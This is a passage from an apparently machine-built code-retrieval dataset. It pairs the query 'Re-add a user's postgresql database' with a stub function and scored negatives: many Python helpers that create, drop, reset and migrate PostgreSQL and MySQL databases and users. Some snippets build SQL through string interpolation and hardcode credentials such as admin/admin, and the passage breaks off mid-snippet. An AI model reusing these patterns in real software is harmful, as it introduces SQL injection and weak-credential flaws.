\n if lst is None:\n lst = []\n \n division = len(lst)/float(n)\n \n return [ lst[int(round(division * i)):\n int(round(division * (i+1)))] for i in xrange(int(n))]", "def remove_elements(l, e):\n return [x for x in l if x != e]", "def get_filter_results (twitter_data, search_list, filter_data):\n\n #initialize\n filter_list = []\n\n for operation in filter_data:\n if operation == 'name-includes':\n for username in search_list:\n # since case doesnt matter, eveything is made uppercase and\n # then is checked\n if filter_data [operation].upper() in \\\n twitter_data [username]['name'].upper():\n filter_list.append (username)\n\n elif operation == 'location-includes':\n for username in search_list:\n # same case as above\n if filter_data [operation].upper() in \\\n twitter_data [username]['location'].upper():\n filter_list.append (username)\n\n elif operation == 'follower':\n for username in search_list:\n if username in \\\n twitter_data[filter_data [operation]]['following']:\n filter_list.append (username)\n\n elif operation == 'following':\n for username in search_list:\n if username in all_followers(twitter_data, filter_data[operation]):\n filter_list.append (username)\n\n search_list = filter_list\n filter_list = []\n\n filter_list = search_list\n filter_list.sort() # sort the list alphabetically for testing purposes\n\n return filter_list", "def makelist(count, lista):\n if count <= 8:\n return makelist(count+1, lista+[(int(input()))])\n print(*list(filter(lambda x: x%2 == 0, lista)))", "def filter(iteratee, seq):\n return _filter(fnc.iteratee(iteratee), seq)", "def list_by_re_pattern(list_to_be_splited, pattern):\n return [(i, val) for i, val in enumerate(list_to_be_splited)\n if match(pattern, val)]" ]
[ "0.674777", "0.67473686", "0.6627806", "0.63558894", "0.63215184", "0.6267986", "0.6242654", "0.6209429", "0.6174839", "0.60629857", "0.6052656", "0.5999534", "0.596492", "0.59513366", "0.59276193", "0.59161556", "0.58984244", "0.58968115", "0.5890496", "0.5857357", "0.5817321", "0.57994425", "0.57694507", "0.57664037", "0.56926835", "0.56393397", "0.5614123", "0.5606712", "0.56009465", "0.55927694", "0.55923766", "0.55818695", "0.5574288", "0.55656666", "0.55626595", "0.55594295", "0.55522", "0.54796565", "0.5462819", "0.5462819", "0.54502374", "0.54450524", "0.5440648", "0.5425161", "0.54111737", "0.54033947", "0.54014534", "0.5389343", "0.53841424", "0.5381395", "0.5375043", "0.53660077", "0.5357476", "0.53567415", "0.53519046", "0.53471065", "0.5346417", "0.5331282", "0.5298437", "0.52949816", "0.5292878", "0.5289552", "0.52838176", "0.52799267", "0.5279266", "0.52555686", "0.5254482", "0.5247823", "0.5232848", "0.52274626", "0.52090126", "0.5201376", "0.51950634", "0.51854366", "0.5182156", "0.5175536", "0.5134149", "0.5133744", "0.5124333", "0.5122465", "0.5091875", "0.508589", "0.5068351", "0.5065897", "0.50656605", "0.5064823", "0.506298", "0.50621146", "0.5058944", "0.50462806", "0.50420344", "0.5037218", "0.50275123", "0.50067174", "0.5005729", "0.5004472", "0.4995479", "0.49934635", "0.49910033", "0.4985135" ]
0.54409194
42
Re-add a user's postgresql database.
def _add_postgresql(user, options, dump = None): if dump is not None: pass
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def postgres_rebuild(name=None, user=None):\n name = check(name, 'name: The dabatase name to create.')\n user = check(user, 'user: the user to grant privileges.')\n\n drop_postgres_db(name=name, user=user)\n create_postgres_db(name=name, user=user, password=password)", "def recreate_db():\n drop_db()\n create_db()", "def recreate_db():\n drop_db()\n create_db()\n populate_db()", "def reset_db():\n \n if not env.environment == 'staging':\n abort('reset_db requires the staging environment.')\n answer = prompt('Are you sure you want to drop and re-create the database?', default='n')\n if answer == 'y':\n sudo('dropdb %(database_name)s' % env, user='postgres')\n create_db()\n mgmt('syncdb', '--migrate')\n else:\n abort('Aborting...')", "def postgres_drop(name=None, user=None):\n name = check(name, 'name: The dabatase name to create.')\n user = check(user, 'user: the user to grant privileges.')\n\n postgres_run((\n \"drop database if exists {name}\",\n \"drop role if exists {user}\"\n ), {'name': name, 'user': user})", "def reset_db():\n\n webapp.dbsql.drop_all()\n webapp.dbsql.create_all()\n webapp.dbsql.session.commit()", "def rebuild_db():\n delete_db()\n create_db()\n insert_db()", "def create_database():\n db_user = 'expensetracker' # define these\n db_pass = 'beta'\n db_table = 'expensetracker'\n\n local('psql -U postgres -c \"DROP ROLE IF EXISTS %s\"'%db_user)\n local('psql -U postgres -c \"CREATE USER %s WITH NOCREATEDB NOCREATEUSER ENCRYPTED PASSWORD E\\'%s\\'\"' % (db_user, db_pass))\n local('psql -U postgres -c \"DROP DATABASE IF EXISTS %s\"'%db_table)\n local('psql -U postgres -c \"CREATE DATABASE %s WITH OWNER %s\"' % (\n db_table, db_user))", "def upgrade_app_db(app, user):\n ctx.logger.info('Upgrading %s DB', app.capitalize())\n run('db-migrate', app, user)", "def post_install_postgresql():\n from django.conf import settings as s\n with settings(warn_only=True):\n sudo('/etc/init.d/postgresql-8.4 restart')\n sudo(\"psql template1 -c \\\"ALTER USER postgres \" \\\n \"with encrypted password '%s';\\\" \" % env.password,\n user='postgres')\n sudo(\"psql -f /usr/share/postgresql/8.4/contrib/adminpack.sql\",\n user='postgres')\n if (s.DATABASES['default']['ENGINE'] ==\n 'django.db.backends.postgresql_psycopg2'):\n sudo(\"psql template1 -c \\\"CREATE ROLE %s LOGIN with \" \\\n \"encrypted password '%s';\\\" \" % (\n s.DATABASES['default']['USER'],\n s.DATABASES['default']['PASSWORD'],\n ),\n user='postgres')\n sudo('createdb -T template0 -O %s %s' % (\n s.DATABASES['default']['USER'],\n s.DATABASES['default']['NAME'],\n ),\n user='postgres')\n\n print \"* setup postgres user password with your \" \\\n \"'%s' password\" % env.user\n print \"* imported the adminpack\"\n print \"Post install setup of Postgresql complete!\"", "def resetdb():\n\n if database_exists(DB_URL):\n print('Deleting database.')\n drop_database(DB_URL)\n if not database_exists(DB_URL):\n print('Creating database.')\n create_database(DB_URL)\n\n print('Creating tables.')\n db.create_all()\n print('Shiny!')", "def setup_db(self):\n\n with cd(\"/var/lib/postgresql\"):\n with settings(warn_only=True):\n sudo(\"psql -c \\\"CREATE USER {0} WITH PASSWORD '{1}';\\\"\".format(config.get(\"postgres_user\", self.app_name), config.get(\"postgres_password\", self.app_name)), user=\"postgres\")\n sudo(\"createdb {0}\".format(self.db_name), user=\"postgres\")\n sudo(\"psql -c \\\"GRANT ALL PRIVILEGES ON DATABASE {0} TO {1};\\\"\".format(self.db_name, config.get(\"postgres_user\", self.app_name)), user=\"postgres\")", "def 
mysql_rebuild(name=None, user=None, password=None, host=None,\n db_password=None, port=''):\n name = check(name, 'name: the database name to create.')\n user = check(user, 'user: the user to grant privileges')\n password = check(password, 'password: user\\'s password')\n host = check(host, 'host: machine ', 'mysql_host', default='localhost')\n db_password = check(db_password, 'db_password: mysql password.')\n port == ':'+port if port is not '' else ''\n\n drop_postgres_db(name=name, user=user, db_password=db_password)\n create_postgres_db(name=name, user=user, password=password, host=host,\n db_password=db_password, port=port)", "def clear_db(app, user):\n ctx.logger.info('Clearing %s DB', app.capitalize())\n run('db-migrate-clear', app, user)", "def populate_db():\n try:\n users = [\n User(name=u'admin', role=1),\n ]\n db.session.add_all(users)\n db.session.commit()\n except:\n db.session.rollback()\n raise Exception(\"Failed to populate the database\")\n finally:\n db.session.close()", "def remove_database(cls, database_name):\n cls.log.info('Removing database: {}'.format(database_name))\n cls.conn.drop_database(database_name)\n cls.log.info('Database successfully removed.')", "def add_user_sql(self, lncdsql):\n add_user = (\n \"\"\"\n create role %(ra)s with LOGIN REPLICATION password NULL;\n GRANT ALL PRIVILEGES ON DATABASE lncddb TO %(ra)s;\n grant all privileges on all tables in schema public to %(ra)s;\n grant all privileges on all functions in schema public to %(ra)s;\n grant all privileges on all sequences in schema public to %(ra)s;\n \"\"\"\n % self.ra_data\n )\n\n admin_user = \"postgres\"\n user_pass = PasswordDialog.user_pass(\n QtWidgets.QApplication.instance(), admin_user\n )\n if not user_pass[\"pass\"]:\n mkmsg(\"get admin to run\\n\\n %s\" % add_user)\n return\n constr = {**lncdsql.config, \"user\": admin_user, \"password\": user_pass[\"pass\"]}\n dbcon = make_connstr(constr)\n conn = psycopg2.connect(constr)\n conn.set_session(autocommit=True)\n didadd = catch_to_mkmsg(conn.execute, add_user)\n # TODO: cache admin password?\n conn.close()\n return didadd", "def create_database():\n # Depending on your local settings, you may need to specify a user and password, e.g.\n # conn = psycopg2.connect(dbname=\"postgres\", user=\"postgres\", password=\"password\")\n conn = psycopg2.connect(dbname=\"postgres\")\n conn.autocommit = True # it seems this mode is needed to make a db\n conn.set_isolation_level(0) # also this for dropping db\n\n # un-comment this line if you already have a database called\n # `opportunity_youth` and you want to drop it\n # execute_sql_script(conn, \"01_drop_old_database.sql\")\n execute_sql_script(conn, \"02_create_new_database.sql\")\n\n conn.close()", "def remove_database(dbname: str) -> None:\n # Initialize connection.\n connection, cursor = hsql.get_connection(\n dbname=os.environ[\"POSTGRES_DB\"],\n host=os.environ[\"POSTGRES_HOST\"],\n port=int(os.environ[\"POSTGRES_PORT\"]),\n user=os.environ[\"POSTGRES_USER\"],\n password=os.environ[\"POSTGRES_PASSWORD\"],\n )\n # Drop database.\n cursor.execute(psql.SQL(\"DROP DATABASE {};\").format(psql.Identifier(dbname)))\n # Close connection.\n connection.close()", "def set_db_details(db, db_username, db_password):\n set_db_user_access(db_username)\n create_db_user(db_username, db_password)\n create_db(db, db_username)\n restart_db()\n restart_IA()\n create_IA_metauser(db)\n print color_text(\"Postgres is configured.\", GOOD)", "def recreate_db():\n db.session.execute('SET FOREIGN_KEY_CHECKS=0;')\n 
db.session.execute('DROP TABLE IF EXISTS logs;')\n db.session.execute('DROP TABLE IF EXISTS employees;')\n db.session.execute('DROP TABLE IF EXISTS sales;')\n db.session.execute('DROP TABLE IF EXISTS plants;')\n db.session.execute('DROP TABLE IF EXISTS products;')\n db.session.execute('DROP TABLE IF EXISTS suppliers;')\n db.session.execute('DROP TABLE IF EXISTS orders;')\n db.session.execute('DROP TABLE IF EXISTS contacts;')\n db.session.execute('DROP TABLE IF EXISTS varieties;')\n db.session.execute('DROP TABLE IF EXISTS species;')\n db.session.execute('DROP TABLE IF EXISTS genera;')\n db.session.execute('DROP TABLE IF EXISTS families;')\n db.drop_all()\n db.create_all()\n db.session.commit()\n fakePlant = Plant(living = True)\n db.session.add(fakePlant)\n db.session.commit()\n db.session.delete(fakePlant)\n db.session.execute('SET FOREIGN_KEY_CHECKS=1;')\n db.session.commit()", "def pg_drop(ctx):\n ctx.obj = ConfigDBConnector()\n ctx.obj.connect()", "def migrate_database(self):\n\n self.db.migrate_database()", "def drop_database():\n drop_db(app)", "def remove():\n\n db_remove()", "def restart_db():\n print system(\"service postgresql restart \")\n time.sleep(POSTGRES_WAIT)", "def db_create():\n db.drop_all()\n db.create_all()\n db.session.commit()", "def db(app, request):\n with app.app_context():\n _db.drop_all()\n _db.create_all()", "def upgrade_environment(self, db):\n if db is not None:\n db.commit()\n self.create_db()", "def reset_database(self):\n\n self.db.reset_database()", "def restore_database(app):\n app.database().restore()\n app.refresh()", "def initDB(host, port, user, dbName):\n # Replace the old database and create a new one\n print \"Kill existing session...\"\n with open('sql/killsession.sql') as fin:\n sql = fin.read() % dbName\n cmdStr = \"psql -h %s -p %s -U %s -c \\\"%s\\\"\" \\\n % (host, port, user, sql)\n os.popen(cmdStr)\n\n print \"Initialize point cloud database...\"\n cmdStr = \"psql -h %s -p %s -U %s -c \\\"DROP DATABASE IF EXISTS %s;\\\"\" \\\n % (host, port, user, dbName)\n os.popen(cmdStr)\n\n cmdStr = \"psql -h %s -p %s -U %s -c \\\"CREATE DATABASE %s;\\\"\" \\\n % (host, port, user, dbName)\n os.popen(cmdStr)\n\n cmdStr = \"psql -h %s -p %s -U %s -d %s -f sql/dbinit.sql\" \\\n % (host, port, user, dbName)\n os.popen(cmdStr)", "def reset_db():\n db.drop_all()\n _init_db()", "def _init_db():\n c = ppc.app().config['PUBLICPRIZE']['DATABASE']\n e = os.environ.copy()\n e['PGPASSWORD'] = c['postgres_pass']\n subprocess.call(\n ['createuser', '--host=' + c['host'], '--user=postgres',\n '--no-superuser', '--no-createdb', '--no-createrole', c['user']],\n env=e)\n p = subprocess.Popen(\n ['psql', '--host=' + c['host'], '--user=postgres', 'template1'],\n env=e,\n stdin=subprocess.PIPE)\n s = u\"ALTER USER {user} WITH PASSWORD '{password}'\".format(**c)\n enc = locale.getlocale()[1]\n loc = locale.setlocale(locale.LC_ALL)\n p.communicate(input=bytes(s, enc))\n subprocess.check_call(\n ['createdb', '--host=' + c['host'], '--encoding=' + enc,\n '--locale=' + loc, '--user=postgres',\n '--template=template0',\n '--owner=' + c['user'], c['name']],\n env=e)", "def reset_dbs():\n db.answering_users.remove({})\n db.answered_users.remove({})", "def postgresql():\n icanhaz.postgres.server()\n\n icanhaz.postgres.user('pguser', 'foo')\n assert fabtools.postgres.user_exists('pguser')\n\n icanhaz.postgres.database('pgdb', 'pguser')\n assert fabtools.postgres.database_exists('pgdb')", "def create_db(db, db_username):\n print system(\"su -c \\\"echo \\\\\\\"create database \" + 
db + \" with owner \" + db_username + \";\\\\\\\" | psql \\\" postgres\")", "def drop_user(self):\n try:\n with self.connect_db:\n request = \"\"\"DROP TABLE IF EXISTS user\"\"\"\n self.connect_db.execute(request)\n self.connect_db.commit()\n\n except Exception:\n super_logger.error('Error drop_user', exc_info=True)", "def reset_db(name, fail_ok=True):\n print(\"Deleting\", db_path(name))\n close_old_connections()\n delete_failed = False\n if os.path.exists(db_path(name)): # your database is corrupted and must be destroyed\n connections[name].close()\n try:\n # or you could http://stackoverflow.com/a/24501130/2291495\n os.remove(db_path(name))\n except PermissionError as err: # must still be holding onto the file lock, clear out contents instead\n if not fail_ok:\n raise err\n else: # I already tried manage.py flush. It doesn't do enough\n execute = connections[name].cursor().execute\n # raw_sql = \"select 'drop table ' || name || ';' from sqlite_master where type = 'table';\"\n execute(\"PRAGMA writable_schema = 1;\")\n execute(\"delete from sqlite_master where type in ('table', 'index', 'trigger');\")\n execute(\"PRAGMA writable_schema = 0;\")\n execute(\"VACUUM;\")\n execute(\"PRAGMA INTEGRITY_CHECK;\")\n print(\"===Dropping all Tables===\")\n else:\n print(db_path(name), \"does not exist\")\n #creates a new blank file by migrate\n call_command('migrate', database=name, interactive=False, fake_initial=True)\n if name == 'default': # create super user\n create_super_user()", "def createDb():\n db.drop_all()\n db.create_all()", "def drop_database(self):\n self.connection.drop_database(self.database)\n self.database = self.connection[self._database_name]", "def init_db_command():\n upgrade()\n from .model import User, db\n u = User.query.filter_by(email='demos@gammalab.us').first()\n if not u:\n u = User(email='demos@gammalab.us', password='test')\n db.session.add(u)\n db.session.commit()\n click.echo('Add new user(email: demos@gammalab.us password: test)')\n click.echo('Initialized the database.')", "def drop_db():\n database.db.reflect()\n database.db.drop_all()\n print('Dropped the database')", "def delete_db():\n db.drop_all()", "def removedb(dbname):\n os.system(\"dropdb %s\" % dbname)", "def reset_db():\n from alembic.command import downgrade, upgrade\n from alembic.config import Config as AlembicConfig\n config = AlembicConfig('alembic.ini')\n downgrade(config, 'base')\n upgrade(config, 'head')\n print('Database has been reset')", "def _add_mysql(user, options, dump = None):\n # Access the new username with user[\"username\"]\n pass", "def AddDatabase(parser, help_text, required=False):\n parser.add_argument('--database', '-d', required=required, help=help_text)", "def recreate_db():\n\n print(\"will reinit db - FAKE\")\n db.create_tables([Message, Instance])\n\n # no need to prepare a sample record.\n # use http to create init request instead.\n #inject_record()", "def db():\n the_db.session.close()\n the_db.drop_all()\n the_db.create_all()\n return the_db", "def drop_db():\n db.drop_all()", "def drop_db():\n db.drop_all()", "def drop_db():\n db.drop_all()", "def drop_db():\n db.drop_all()", "def drop_db():\n db.drop_all()", "def drop_db():\n db.drop_all()", "def drop_db():\n db.drop_all()", "def drop_db():\n db.drop_all()", "def drop_db():\n db.drop_all()", "def delete_database(self, db_name):\n seqids = self.read_sequence_ids()\n if seqids.has_key(db_name):\n del seqids[db_name]\n self.write_sequence_ids(seqids)\n self._announce_updates({'type' : 'deleted_db', 'data' : 
db_name})", "def dropdb():\n db.drop_all()", "def change_db_user_password(self, username, password):\n\n self.sql(\"ALTER USER %s WITH PASSWORD '%s'\" % (username, password))", "def recreate_db(self, run=False):\n if run:\n db_schema = open(self.db_schema_file).read().splitlines()\n for s in db_schema:\n t = s.strip()\n if len(t):\n self.cur.execute(t)", "def set_db_user_access(db_username):\n #update pg_hba conf file with user entry will only ever be for local host\n print \"Configuring postgres access for \\\"\" + db_username + \"\\\" \"\n try:\n pg_hba = codecs.open(r\"/var/lib/pgsql/data/pg_hba.conf\", encoding=\"utf-8\", mode=\"r+\")\n except IOError:\n system(\"service postgresql initdb\")\n pg_hba = codecs.open(r\"/var/lib/pgsql/data/pg_hba.conf\", encoding=\"utf-8\", mode=\"r+\")\n\n pg_hba_text = pg_hba.read()\n pg_hba.seek(0)\n pg_hba.write(\"host all \" + db_username + \" 127.0.0.1/32 md5 #IATINSERT\\n\" + pg_hba_text)\n pg_hba.close()\n\n restart_db()", "def db_drop_and_create_all():\n db.drop_all()\n db.create_all()", "def drop_db():\n if prompt_bool(\"Are you sure you want to lose all your data?\"):\n app = create_app(dotenv.get('FLASK_CONFIG'))\n with app.app_context():\n db.drop_all()", "def add_user(db_file, user_uri, user_name):\n\n conn = create_db_connection(db_file)\n cur = conn.cursor()\n\n # Add new user to user table\n new_user = (user_uri, user_name)\n sql_add_new_user = \"\"\" INSERT INTO users(user_uri, user_name)\n VALUES(?,?) \"\"\"\n\n try:\n cur.execute(sql_add_new_user, new_user)\n except Exception as e:\n print(\"Failed adding entry to table users: \" + str(e))\n \n\n conn.commit()\n cur.close()", "def migrate_database():\n log('Migrating the keystone database.', level=INFO)\n service_stop(keystone_service())\n # NOTE(jamespage) > icehouse creates a log file as root so use\n # sudo to execute as keystone otherwise keystone won't start\n # afterwards.\n cmd = ['sudo', '-u', 'keystone', 'keystone-manage', 'db_sync']\n subprocess.check_output(cmd)\n service_start(keystone_service())\n time.sleep(10)\n peer_store('db-initialised', 'True')", "def close_db(error):\n if hasattr(g, 'postgresdb'):\n g.postgresdb.close()", "def close_db(error):\n if hasattr(g, 'postgres_db'):\n g.postgres_db.close()", "def create_db():\n init_postgres(current_app.config['SQLALCHEMY_DATABASE_URI'])", "def create_user_database(username):\n with _superuser_connection() as conn:\n res = conn.create_user_database(username=username)\n return res", "def create_db():\n\n require('environment', provided_by=env.environments)\n sudo('createdb -O %(database_user)s -T %(template_db)s %(database_name)s' % env, user='postgres')", "def seed_db():\n db.session.add(User(username='Joe', email='shmoe@test.com'))\n db.session.add(User(username='Joe2', email='joe@test.com'))\n db.session.commit()", "def delete():\n\n from slicr.extensions import db\n\n click.echo('deleting database...')\n\n db.drop_all()", "def test_add_user_to_db():\n path_users = PATH_TEST / \"users.txt\"\n\n try:\n db = get_database()\n add_users_to_db(db, path_users)\n finally:\n db.drop_collection(USERS_COLLECTION)", "def postgres(self, command):\n show = not command.startswith(\"psql\")\n return self.run_command(\n \"sudo -u root sudo -u postgres %s\" % command, show=show)", "def init_db():\n current_app.logger.info('Creating database...')\n db.drop_all()\n db.create_all()\n db.session.commit()", "def add_db(self):\n name_db = self.name_db.get()\n if len(name_db) > 0:\n self.sql_database.db_name = name_db\n if 
self.sql_database.create_database():\n msg.showinfo(\n message=\"\".join(\n [str(self.name_db.get()), \" created as text_reader_\", str(self.sql_database.db_name)]))\n self.name_db.delete(0, tk.END)\n self.show_db_combobox()\n else:\n msg.showinfo(message=\"Failed\")\n else:\n msg.showinfo(message=\"Write db name!\")", "def reload_db(self):\n if not settings.DATABASE_ENGINE in ['sqlite3', 'postgresql_psycopg2']:\n return None\n # Close connection to cleanly swap databases.\n connection.close()\n if settings.DATABASE_ENGINE == 'sqlite3':\n shutil.copyfile(self.db_backup_path, self.db_path)\n if settings.DATABASE_ENGINE == 'postgresql_psycopg2':\n # Establish a temporal connection to template1 database and\n # recreate TEST_DB_NAME.\n connection.settings_dict[\"DATABASE_NAME\"] = 'template1'\n cursor = connection.cursor()\n connection.creation.set_autocommit()\n cursor.execute(\"DROP DATABASE IF EXISTS %s\" % self.db_name)\n cursor.execute(\"CREATE DATABASE %s WITH TEMPLATE %s_backup\" % (\n self.db_name, self.db_name))\n connection.close()\n # Change the connection to the new test database.\n settings.DATABASE_NAME = self.db_name\n connection.settings_dict[\"DATABASE_NAME\"] = self.db_name\n # Get a cursor (even though we don't need one yet). This has\n # the side effect of initializing the test database.\n connection.cursor()\n return True", "def create_database(port, db_name, db_user, db_password):\n # Check the server version and status:\n can_migrate = check_postgres_server(port)\n print(\"Erzeuge Datenbank und Datenbankbenutzer...\", end=\"\", flush=True)\n # Need to start the service first, if postgres was only just installed.\n _run('sudo service postgresql start', capture_output=True)\n # Create the user and the database:\n _run(\n 'sudo -u postgres psql -c '\n f'\"CREATE USER {db_user} CREATEDB ENCRYPTED PASSWORD {db_password};\"',\n capture_output=True, raise_on_error=False\n )\n created_db = _run(\n f\"sudo -u postgres createdb {db_name} --owner={db_user}\",\n capture_output=True, raise_on_error=False\n )\n\n if not created_db.returncode:\n print(\"OK.\")\n else:\n print(\"Fehlgeschlagen.\")\n return can_migrate and not created_db.returncode", "def drop(name):\n\t\treturn \"DROP DATABASE {0};\".format(name)", "def delete_database(conn, schema=None):\n\n conn.set_session(autocommit=True)\n cur = conn.cursor()\n if schema is None:\n schema = 'leadmachine'\n\n # delete lead machine database with UTF8 encoding\n cur.execute(f\"DROP DATABASE IF EXISTS {schema}\")\n cur.close()\n conn.commit()", "def delete_sql_user(user, server, database):\n betterprint(\"Deleting {} from server {} and db {}\".format(user, server, database))\n\n sql = \"DROP USER [{}]\".format(user)\n\n try:\n betterprint(\"SQL: \" + sql)\n rows, userdata = execute_sql(sql, server, database)\n betterprint(\"USER removal successful.\")\n return True\n except Exception as e:\n print (e)\n return False", "def add_user_to_g():\n \n if CURRENT_USER in session:\n g.user = User.query.get(session[CURRENT_USER])\n\n else:\n g.user = None", "def __addNewAdminDB(self,admin_id,username,password,name,comment,creator_id):\n query = self.__addNewAdminQuery(admin_id,username,password,name,comment,creator_id)\n query += self.__addNewAdminIASQuery(username, creator_id)\n db_main.getHandle().transactionQuery(query)", "def pg_reset(pg):\n pg.reset_hba()\n os.truncate(pg.pgdata / \"postgresql.auto.conf\", 0)\n\n # If a previous test restarted postgres, it was probably because of some\n # config that could only be changed across restarts. 
To reset those, we'll\n # have to restart it again. In other cases a reload should be enough to\n # reset the configuration.\n if pg.restarted:\n pg.restart()\n pg.restarted = False\n else:\n pg.reload()\n\n yield", "def update_dev_db():\n with cd(\"/tmp\"), lcd(\"/tmp\"):\n sudo(\"pg_dump gsi > /tmp/latest.sql\", user=\"postgres\")\n run(\"tar zcvf latest.sql.tgz latest.sql\")\n get(\"/tmp/latest.sql.tgz\", \"latest.sql.tgz\")\n sudo(\"rm /tmp/latest.sql.tgz /tmp/latest.sql\")\n\n local(\"dropdb gsi\")\n local(\"createdb gsi\")\n local(\"tar zxvf latest.sql.tgz\")\n local(\"psql gsi < latest.sql\")\n local(\"rm latest.sql latest.sql.tgz\")", "def add_users():\n try:\n User.objects.get(username='admin').delete()\n except User.DoesNotExist:\n pass\n User.objects.create_superuser(username='admin', password='admin', email='')\n print('> Superuser was created')\n\n try:\n User.objects.get(username='user1').delete()\n except User.DoesNotExist:\n pass\n User.objects.create_user(username='user1', password='user1', email='')\n print('> User (user1) was created')", "def add_user_to_db(new_profile):\n try:\n params = (new_profile.client_nickname,\n new_profile.client_username,\n new_profile.client_hostname,\n new_profile.client_port)\n client_db.execute(\"INSERT INTO clients VALUES (?, ?, ?, ?)\", params)\n client_detail_list.commit()\n client_detail_list.close()\n except:\n print('User already exists, try deleting the profile first.')", "def create_db_user():\n\n require('environment', provided_by=env.environments)\n _load_passwords(['database_password'], generate=True)\n postgres.create_db_user(env.database_user, password=env.database_password)", "def drop_db(self):\n db_name = self.db.db_url.split('///')[1]\n if os.path.exists(db_name):\n os.remove(db_name)", "def create_dbuser(default_db_name, superuser_name, superuser_password, db_host, db_port, poi_user_name, poi_user_password):\n try:\n logging.info(\"Connecting to database postgres as user postgres at host %s port %s\", db_host, db_port)\n connection = psycopg2.connect(dbname=default_db_name, user=superuser_name, host=db_host, password=superuser_password, port=db_port)\n\n connection.autocommit=True\n cursor = connection.cursor()\n\n logging.info(\"Creating role %s\", poi_user_name)\n query = '''CREATE ROLE %s WITH \n NOSUPERUSER\n NOCREATEDB\n NOCREATEROLE\n NOINHERIT\n LOGIN\n CONNECTION LIMIT -1\n ENCRYPTED PASSWORD %s'''\n params = (AsIs(poi_user_name), poi_user_password)\n cursor.execute(query, params)\n\n logging.info(\"Successfully created user %s\", poi_user_name)\n except psycopg2.ProgrammingError as e:\n if e.pgcode == '42710': #duplicate_object error code\n logging.warning(\"Role %s already exists. 
Make sure it has the necessary privileges or delete it and run the setup script again\", poi_user_name)\n else:\n raise Exception(\"Exception creating user\" + poi_user_name + \": \" + str(e))\n except Exception as e:\n raise Exception(\"Exception creating user:\" + str(e))", "def db(app):\n _db.drop_all()\n _db.create_all()\n\n # Create a single user because a lot of tests do not mutate this user.\n # It will result in quite a bit faster tests.\n params = {\n 'role': 'admin',\n 'email': 'admin@localhost.com',\n 'name': 'Dev',\n 'password': 'password'\n }\n\n admin = User(**params)\n\n _db.session.add(admin)\n _db.session.commit()\n\n return _db", "def mysql_drop(name=None, user=None, db_password=None):\n name = check(name, 'name: the database name to delete.')\n user = check(user, 'user: the user to remove.')\n password = check(password, 'password: user\\'s password')\n host = check(host, 'host: machine ', default='localhost')\n db_password = check(db_password, 'db_password: mysql password.')\n port == ':'+port if port is not '' else ''\n\n mysql_run((\n \"DROP DATABASE IF EXISTS {name}\",\n \"DROP USER {user}\",\n ), {'name': name, 'user': user, 'password': password, 'host': host,\n 'port': port}, db_password=db_password)", "def newDb(options, dbName, adminPswd, userPswd, viewerPswd):\n if not re.match(\"^[A-Za-z][A-Za-z0-9_]*$\", dbName):\n errorPrint(\"'%s' is not a valid database name\" % dbName)\n return\n\n adminName = dbName + \"_admin\"\n userName = dbName + \"_user\"\n viewerName = dbName + \"_viewer\"\n\n setupDictionaryDatabases(options, {\n 'databases': {\n dbName: {\n 'ownerRole': adminName,\n 'roles': {\n adminName: {\n 'password': adminPswd,\n 'role': 'admin'\n },\n userName: {\n 'password': userPswd,\n 'role': 'writer'\n },\n viewerName: {\n 'password': viewerPswd,\n 'role': 'reader'\n }\n }\n }\n }\n })", "def initDb():\n createDb()\n admin = User(\n name=\"faby\",\n lastname=\"star\",\n username=\"faby\",\n email=\"star._faby@hotmail.com\",\n isAdmin=True,\n cellphone=\"0983856136\",\n )\n admin.onSetPassord(\"faby123\")\n db.session.add(admin)\n db.session.commit()", "def createdb():\n db.create_all()", "def add_admin(self, username, password):\n password_hash = generate_password_hash(password) # Generates a SHA256 hash.\n try:\n self.cur.execute(\"INSERT INTO admins VALUES(\\\"{}\\\", \\\"{}\\\")\".format(username, password_hash))\n self.db.commit()\n except:\n self.db.rollback()", "def create_database():\n create_db(app)" ]
[ "0.7393419", "0.6982639", "0.6812037", "0.642954", "0.6232582", "0.62139505", "0.6179955", "0.5981221", "0.5960473", "0.5953316", "0.5928391", "0.59170234", "0.58603674", "0.58522147", "0.5849216", "0.5843206", "0.5840966", "0.5813732", "0.5810215", "0.58094305", "0.580628", "0.5798358", "0.5770416", "0.57682955", "0.5758723", "0.5741439", "0.5728568", "0.56953126", "0.5677446", "0.5663077", "0.56555533", "0.56550294", "0.564832", "0.56460047", "0.56258255", "0.56182843", "0.56138176", "0.55702883", "0.5566489", "0.55630934", "0.55548674", "0.55441654", "0.5521494", "0.5499801", "0.5496105", "0.54944515", "0.5485753", "0.54776895", "0.54705936", "0.54645675", "0.5458608", "0.5458608", "0.5458608", "0.5458608", "0.5458608", "0.5458608", "0.5458608", "0.5458608", "0.5458608", "0.5454708", "0.5449918", "0.543663", "0.5432458", "0.5423032", "0.5420444", "0.5410179", "0.54087853", "0.54059964", "0.5401194", "0.54009366", "0.5397867", "0.5393344", "0.5387145", "0.53680897", "0.5367662", "0.5367367", "0.5357914", "0.535699", "0.53567344", "0.53534436", "0.5326575", "0.5324594", "0.53214216", "0.5313185", "0.53081816", "0.5306149", "0.5292916", "0.52902365", "0.52876484", "0.52862394", "0.5279691", "0.5274808", "0.52739453", "0.5273722", "0.5271635", "0.5269341", "0.5263631", "0.5261441", "0.52569324", "0.52321595" ]
0.60755813
7
Adds a user's MySQL tables back into the OCF database.
def _add_mysql(user, options, dump=None):
    # Access the new username with user["username"]
    pass
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def insert_db():\n populate_tables()", "def create_tables_and_apply_patches(self):\n\n if self.authorized and not self.db_tables_initiated:\n with self.connection.cursor() as cursor:\n for statement in self.parse_mysql_sql_file():\n cursor.execute(statement)\n\n PyFunceble.LOGGER.info(\n \"Created the missing tables. Applied all patched\"\n )\n\n self.db_tables_initiated = True", "def drop_tables(self):\n con = self.connect()\n cursor = con.cursor()\n cursor.execute(\"\"\"DROP TABLE IF EXISTS users CASCADE\"\"\")\n cursor.close()\n con.commit()\n con.close()", "def set_up_db():\n DATABASE.drop_tables([Customer])\n DATABASE.close()\n DATABASE.create_tables([Customer])\n DATABASE.close()", "def populate_db():\n try:\n users = [\n User(name=u'admin', role=1),\n ]\n db.session.add_all(users)\n db.session.commit()\n except:\n db.session.rollback()\n raise Exception(\"Failed to populate the database\")\n finally:\n db.session.close()", "def append_table(self, table):\n\n self._db_manager.register_table(table)", "def drop_tables():\n drop_table(ShoppingList)\n drop_table(User)\n drop_table(Category)", "def initialize():\n DATABASE.connect()\n DATABASE.create_tables([User, Entry], safe=True)\n DATABASE.close()", "def add_user(uid):\n if \"drop tables\" in uid:\n raise 